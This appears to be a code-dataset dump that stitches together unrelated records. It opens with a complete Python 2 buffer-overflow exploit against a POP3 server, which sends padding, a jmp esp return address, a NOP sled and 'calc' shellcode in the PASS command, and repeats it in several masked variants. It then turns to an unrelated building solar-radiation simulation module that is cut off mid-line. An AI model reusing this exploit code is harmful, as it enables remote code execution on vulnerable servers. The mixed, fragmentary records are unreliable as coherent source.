shellcode_calc += b'\x84\x84\xc1\xee\xb5\x0f\x8eiJ\xda'
shellcode_calc += b'\xeb\x96\xa8\xcf\x01?u\x9a\xa8"'
shellcode_calc += b'\x86p\xeeZ\x05q\x8e\x98\x15\xf0'
shellcode_calc += b'\x8b\xe5\x91\xe8\xe1vt\x0fVv'
shellcode_calc += b']a=\xfc~\x0b\xce\x99\x0c\xd3'
shellcode_calc += b'\x1f\x03\x95w\x7f\xa54\x13\x1a\t'
shellcode_calc += b'\xd1\x82\x8f,/5.\xdc<\xb5'
buf = ''
buf += 'A' * (offset_srp - len(buf))
buf += struct.pack('<I', jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += 'D' * (buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
<|reserved_special_token_1|>
#!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
|
flexible
|
{
"blob_id": "280a4e1fb35937bb5a5c604f69337d30a4b956a9",
"index": 6302,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns.connect((RHOST, RPORT))\n<mask token>\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\n<mask token>\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\n<mask token>\ns.send('USER username' + '\\r\\n')\n<mask token>\ns.send('PASS ' + buf + '\\r\\n')\n<mask token>\ns.close\n",
"step-3": "<mask token>\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-4": "import socket\nimport struct\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-5": "#!/usr/bin/env python2\n\nimport socket\nimport struct\n\nRHOST = \"10.10.10.2\"\nRPORT = 110\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\n\n# OFFSETS\n# EIP 4654\n# ESP 342\n# EBP 4650\n# jmp_esp in slmfc.dll at 5f4a358f\njmp_esp = 0x5f4a358f\nnop_sled = \"\\x90\" * 32\n\nbuf_totlen = 5000\noffset_srp = 4654\n\nshellcode_calc = b\"\"\nshellcode_calc += b\"\\xba\\xd5\\x90\\xd2\\x7d\\xdb\\xd5\\xd9\\x74\\x24\"\nshellcode_calc += b\"\\xf4\\x58\\x31\\xc9\\xb1\\x36\\x31\\x50\\x13\\x83\"\nshellcode_calc += b\"\\xe8\\xfc\\x03\\x50\\xda\\x72\\x27\\x81\\x0c\\xf0\"\nshellcode_calc += b\"\\xc8\\x7a\\xcc\\x95\\x41\\x9f\\xfd\\x95\\x36\\xeb\"\nshellcode_calc += b\"\\xad\\x25\\x3c\\xb9\\x41\\xcd\\x10\\x2a\\xd2\\xa3\"\nshellcode_calc += b\"\\xbc\\x5d\\x53\\x09\\x9b\\x50\\x64\\x22\\xdf\\xf3\"\nshellcode_calc += b\"\\xe6\\x39\\x0c\\xd4\\xd7\\xf1\\x41\\x15\\x10\\xef\"\nshellcode_calc += b\"\\xa8\\x47\\xc9\\x7b\\x1e\\x78\\x7e\\x31\\xa3\\xf3\"\nshellcode_calc += b\"\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80\"\nshellcode_calc += b\"\\x04\\x38\\x4c\\xb9\\x0c\\x22\\x91\\x84\\xc7\\xd9\"\nshellcode_calc += b\"\\x61\\x72\\xd6\\x0b\\xb8\\x7b\\x75\\x72\\x75\\x8e\"\nshellcode_calc += b\"\\x87\\xb2\\xb1\\x71\\xf2\\xca\\xc2\\x0c\\x05\\x09\"\nshellcode_calc += b\"\\xb9\\xca\\x80\\x8a\\x19\\x98\\x33\\x77\\x98\\x4d\"\nshellcode_calc += b\"\\xa5\\xfc\\x96\\x3a\\xa1\\x5b\\xba\\xbd\\x66\\xd0\"\nshellcode_calc += b\"\\xc6\\x36\\x89\\x37\\x4f\\x0c\\xae\\x93\\x14\\xd6\"\nshellcode_calc += b\"\\xcf\\x82\\xf0\\xb9\\xf0\\xd5\\x5b\\x65\\x55\\x9d\"\nshellcode_calc += b\"\\x71\\x72\\xe4\\xfc\\x1f\\x85\\x7a\\x7b\\x6d\\x85\"\nshellcode_calc += b\"\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8e\\x69\\x4a\\xda\"\nshellcode_calc += b\"\\xeb\\x96\\xa8\\xcf\\x01\\x3f\\x75\\x9a\\xa8\\x22\"\nshellcode_calc += b\"\\x86\\x70\\xee\\x5a\\x05\\x71\\x8e\\x98\\x15\\xf0\"\nshellcode_calc += b\"\\x8b\\xe5\\x91\\xe8\\xe1\\x76\\x74\\x0f\\x56\\x76\"\nshellcode_calc += b\"\\x5d\\x61\\x3d\\xfc\\x7e\\x0b\\xce\\x99\\x0c\\xd3\"\nshellcode_calc += b\"\\x1f\\x03\\x95\\x77\\x7f\\xa5\\x34\\x13\\x1a\\x09\"\nshellcode_calc += b\"\\xd1\\x82\\x8f\\x2c\\x2f\\x35\\x2e\\xdc\\x3c\\xb5\"\n\nbuf = \"\"\nbuf += \"A\" * (offset_srp - len(buf))\nbuf += struct.pack(\"<I\", jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += \"D\"*(buf_totlen - len(buf))\n\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import os
import numpy as np
import pandas as pd
import py4design.py2radiance as py2radiance
import py4design.py3dmodel.calculate as calculate
from py4design import py3dmodel
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca", "Kian Wee Chen"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "[email protected]"
__status__ = "Production"
from cea.constants import HOURS_IN_YEAR
from cea.resources.radiation_daysim.geometry_generator import BuildingGeometry
from cea import suppress_3rd_party_debug_loggers
suppress_3rd_party_debug_loggers()
def create_sensor_input_file(rad, chunk_n):
sensor_file_path = os.path.join(rad.data_folder_path, "points_" + str(chunk_n) + ".pts")
sensor_file = open(sensor_file_path, "w")
sensor_pts_data = py2radiance.write_rad.sensor_file(rad.sensor_positions, rad.sensor_normals)
sensor_file.write(sensor_pts_data)
sensor_file.close()
rad.sensor_file_path = sensor_file_path
def generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type, orientation, normal, intersection):
mid_pt = py3dmodel.calculate.face_midpt(occface)
location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)
moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(mid_pt, location_pt, occface))
if srf_type == 'roofs':
xdim = ydim = roof_dim
else:
xdim = ydim = wall_dim
# put it into occ and subdivide surfaces
sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)
# calculate list of properties per surface
sensor_intersection = [intersection for x in sensor_surfaces]
sensor_dir = [normal for x in sensor_surfaces]
sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]
sensor_type = [srf_type for x in sensor_surfaces]
sensor_orientation = [orientation for x in sensor_surfaces]
sensor_area = [calculate.face_area(x) * (1.0 - scalar) for x, scalar in zip(sensor_surfaces, sensor_intersection)]
return sensor_dir, sensor_cord, sensor_type, sensor_area, sensor_orientation, sensor_intersection
def calc_sensors_building(building_geometry, grid_size):
sensor_dir_list = []
sensor_cord_list = []
sensor_type_list = []
sensor_area_list = []
sensor_orientation_list = []
sensor_intersection_list = []
surfaces_types = ['walls', 'windows', 'roofs']
sensor_vertical_grid_dim = grid_size["walls_grid"]
sensor_horizontal_grid_dim = grid_size["roof_grid"]
for srf_type in surfaces_types:
occface_list = getattr(building_geometry, srf_type)
if srf_type == 'roofs':
orientation_list = ['top'] * len(occface_list)
normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)
interesection_list = [0] * len(occface_list)
elif srf_type == 'windows':
orientation_list = getattr(building_geometry, "orientation_{srf_type}".format(srf_type=srf_type))
normals_list = getattr(building_geometry, "normals_{srf_type}".format(srf_type=srf_type))
interesection_list = [0] * len(occface_list)
else:
orientation_list = getattr(building_geometry, "orientation_{srf_type}".format(srf_type=srf_type))
normals_list = getattr(building_geometry, "normals_{srf_type}".format(srf_type=srf_type))
interesection_list = getattr(building_geometry, "intersect_{srf_type}".format(srf_type=srf_type))
for orientation, normal, face, intersection in zip(orientation_list, normals_list, occface_list,
interesection_list):
sensor_dir, \
sensor_cord, \
sensor_type, \
sensor_area, \
sensor_orientation, \
sensor_intersection = generate_sensor_surfaces(face,
sensor_vertical_grid_dim,
sensor_horizontal_grid_dim,
srf_type,
orientation,
normal,
intersection)
sensor_intersection_list.extend(sensor_intersection)
sensor_dir_list.extend(sensor_dir)
sensor_cord_list.extend(sensor_cord)
sensor_type_list.extend(sensor_type)
sensor_area_list.extend(sensor_area)
sensor_orientation_list.extend(sensor_orientation)
return sensor_dir_list, sensor_cord_list, sensor_type_list, sensor_area_list, sensor_orientation_list, sensor_intersection_list
def calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):
sensors_coords_zone = []
sensors_dir_zone = []
sensors_total_number_list = []
names_zone = []
sensors_code_zone = []
sensor_intersection_zone = []
for building_name in building_names:
building_geometry = BuildingGeometry.load(os.path.join(geometry_pickle_dir, 'zone', building_name))
# get sensors in the building
sensors_dir_building, \
sensors_coords_building, \
sensors_type_building, \
sensors_area_building, \
sensor_orientation_building, \
sensor_intersection_building = calc_sensors_building(building_geometry, grid_size)
# get the total number of sensors and store in lst
sensors_number = len(sensors_coords_building)
sensors_total_number_list.append(sensors_number)
sensors_code = ['srf' + str(x) for x in range(sensors_number)]
sensors_code_zone.append(sensors_code)
# get the total list of coordinates and directions to send to daysim
sensors_coords_zone.extend(sensors_coords_building)
sensors_dir_zone.extend(sensors_dir_building)
# get total list of intersections
sensor_intersection_zone.append(sensor_intersection_building)
# get the name of all buildings
names_zone.append(building_name)
# save sensors geometry result to disk
pd.DataFrame({'BUILDING': building_name,
'SURFACE': sensors_code,
'orientation': sensor_orientation_building,
'intersection': sensor_intersection_building,
'Xcoor': [x[0] for x in sensors_coords_building],
'Ycoor': [x[1] for x in sensors_coords_building],
'Zcoor': [x[2] for x in sensors_coords_building],
'Xdir': [x[0] for x in sensors_dir_building],
'Ydir': [x[1] for x in sensors_dir_building],
'Zdir': [x[2] for x in sensors_dir_building],
'AREA_m2': sensors_area_building,
'TYPE': sensors_type_building}).to_csv(locator.get_radiation_metadata(building_name), index=None)
return sensors_coords_zone, sensors_dir_zone, sensors_total_number_list, names_zone, sensors_code_zone, sensor_intersection_zone
def isolation_daysim(chunk_n, cea_daysim, building_names, locator, radiance_parameters, write_sensor_data, grid_size,
max_global, weatherfile, geometry_pickle_dir):
# initialize daysim project
daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.format(n=chunk_n))
print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=daysim_project.project_path))
# calculate sensors
print("Calculating and sending sensor points")
sensors_coords_zone, \
sensors_dir_zone, \
sensors_number_zone, \
names_zone, \
sensors_code_zone, \
sensor_intersection_zone = calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir)
num_sensors = sum(sensors_number_zone)
daysim_project.create_sensor_input_file(sensors_coords_zone, sensors_dir_zone, num_sensors, "w/m2")
print("Starting Daysim simulation for buildings: {buildings}".format(buildings=names_zone))
print("Total number of sensors: {num_sensors}".format(num_sensors=num_sensors))
print('Writing radiance parameters')
daysim_project.write_radiance_parameters(radiance_parameters["rad_ab"], radiance_parameters["rad_ad"],
radiance_parameters["rad_as"], radiance_parameters["rad_ar"],
radiance_parameters["rad_aa"], radiance_parameters["rad_lr"],
radiance_parameters["rad_st"], radiance_parameters["rad_sj"],
radiance_parameters["rad_lw"], radiance_parameters["rad_dj"],
radiance_parameters["rad_ds"], radiance_parameters["rad_dr"],
radiance_parameters["rad_dp"])
print('Executing hourly solar isolation calculation')
daysim_project.execute_gen_dc()
daysim_project.execute_ds_illum()
print('Reading results...')
solar_res = daysim_project.eval_ill()
# check inconsistencies and replace by max value of weather file
print('Fixing inconsistencies, if any')
solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)
# Check if leap year and remove extra day
if solar_res.shape[1] == HOURS_IN_YEAR + 24:
print('Removing leap day')
leap_day_hours = range(1416, 1440)
solar_res = np.delete(solar_res, leap_day_hours, axis=1)
print("Writing results to disk")
index = 0
for building_name, \
sensors_number_building, \
sensor_code_building, \
sensor_intersection_building in zip(names_zone,
sensors_number_zone,
sensors_code_zone,
sensor_intersection_zone):
# select sensors data
selection_of_results = solar_res[index:index + sensors_number_building]
selection_of_results[np.array(sensor_intersection_building) == 1] = 0
items_sensor_name_and_result = dict(zip(sensor_code_building, selection_of_results.tolist()))
index = index + sensors_number_building
# create summary and save to disk
write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile)
if write_sensor_data:
write_sensor_results(building_name, items_sensor_name_and_result, locator)
# erase daysim folder to avoid conflicts after every iteration
print('Removing results folder')
daysim_project.cleanup_project()
def write_sensor_results(building_name, items_sensor_name_and_result, locator):
with open(locator.get_radiation_building_sensors(building_name), 'w') as outfile:
json.dump(items_sensor_name_and_result, outfile)
def write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile):
geometry = pd.read_csv(locator.get_radiation_metadata(building_name))
geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'
solar_analysis_fields = ['windows_east_kW',
'windows_west_kW',
'windows_south_kW',
'windows_north_kW',
'walls_east_kW',
'walls_west_kW',
'walls_south_kW',
'walls_north_kW',
'roofs_top_kW']
solar_analysis_fields_area = ['windows_east_m2',
'windows_west_m2',
'windows_south_m2',
'windows_north_m2',
'walls_east_m2',
'walls_west_m2',
'walls_south_m2',
'walls_north_m2',
'roofs_top_m2']
dict_not_aggregated = {}
for field, field_area in zip(solar_analysis_fields, solar_analysis_fields_area):
select_sensors = geometry.loc[geometry['code'] == field].set_index('SURFACE')
area_m2 = select_sensors['AREA_m2'].sum()
array_field = np.array([select_sensors.loc[surface, 'AREA_m2'] *
np.array(items_sensor_name_and_result[surface])
for surface in select_sensors.index]).sum(axis=0)
dict_not_aggregated[field] = array_field / 1000 # in kWh
dict_not_aggregated[field_area] = area_m2
data_aggregated_kW = (pd.DataFrame(dict_not_aggregated)).round(2)
data_aggregated_kW["Date"] = weatherfile["date"]
data_aggregated_kW.set_index('Date', inplace=True)
data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))
|
normal
|
{
"blob_id": "164b0afde225119a8fbd4ccfccbbbc3550aa75fe",
"index": 2634,
"step-1": "<mask token>\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, 'points_' + str(\n chunk_n) + '.pts')\n sensor_file = open(sensor_file_path, 'w')\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.\n sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type,\n orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\n<mask token>\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], 